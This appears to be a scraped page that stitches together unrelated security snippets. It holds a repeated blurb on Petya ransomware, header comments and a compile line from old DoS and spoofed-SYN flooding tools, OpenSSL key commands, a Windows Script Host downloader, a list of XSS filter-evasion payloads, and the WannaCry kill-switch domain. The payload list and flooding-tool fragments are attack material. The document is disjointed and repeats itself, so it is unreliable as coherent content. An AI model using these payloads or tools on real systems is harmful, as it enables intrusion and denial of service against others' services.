#petya #petrWrap #notPetya
Win32/Diskcoder.Petya.C Ransomware attack.
Got new info? Email at isox@vulners.com or @isox_xx Some wrong info? Leave the comment, we will fix it!
/* | |
* targa3 - 1999 (c) Mixter <mixter@newyorkoffice.com> | |
* | |
* IP stack penetration tool / 'exploit generator' | |
* Sends combinations of uncommon IP packets to hosts | |
* to generate attacks using invalid fragmentation, protocol, | |
* packet size, header values, options, offsets, tcp segments, | |
* routing flags, and other unknown/unexpected packet values. | |
* Useful for testing IP stacks, routers, firewalls, NIDS, | |
* etc. for stability and reactions to unexpected packets. |
/* | |
* BANG.C Coded by Sorcerer of DALnet | |
* | |
* FUCKZ to: etech, blazin, udp, hybrid and kdl | |
* PROPZ : skrilla, thanks for all your help with JUNO-Z and especially this code :) | |
* -------------------------------- | |
* REDIRECTION DOS FINALLY DISTRIBUTED !!!!!! | |
* | |
* This is POC and demonstrates a new method of DoS. The idea | |
* behind it is that the attacker generates connection requests |
/* | |
Spoofed SYN by eKKiM | |
Educational purpose only please. | |
Compile with | |
gcc syn.c -pthread | |
*/ | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <netinet/tcp.h> | |
#include <netinet/ip.h> |
#petya #petrWrap #notPetya
Win32/Diskcoder.Petya.C Ransomware attack.
Got new info? Email at isox@vulners.com or @isox_xx Some wrong info? Leave the comment, we will fix it!
# Key considerations for algorithm "RSA" ≥ 2048-bit
openssl genrsa -out server.key 2048
# Key considerations for algorithm "ECDSA" ≥ secp384r1
# List ECDSA the supported curves (openssl ecparam -list_curves)
// httpget.js: download a file (Windows Script Host) | |
// usage: cscript httpget.js <url> <file> | |
(function() { | |
if (WScript.Arguments.Length != 2) { | |
WScript.Echo("Usage: httpget.js <url> <file>") | |
WScript.Quit(1) | |
} | |
var url = WScript.Arguments(0) |
<script\x20type="text/javascript">javascript:alert(1);</script> | |
<script\x3Etype="text/javascript">javascript:alert(1);</script> | |
<script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
<script\x09type="text/javascript">javascript:alert(1);</script> | |
<script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
<script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
<script\x0Atype="text/javascript">javascript:alert(1);</script> | |
'`"><\x3Cscript>javascript:alert(1)</script> | |
'`"><\x00script>javascript:alert(1)</script> | |
<img src=1 href=1 onerror="javascript:alert(1)"></img> |
www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
is up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm.SECURITY BULLETIN AND UPDATES HERE: https://technet.microsoft.com/en-us/library/security/ms17-010.aspx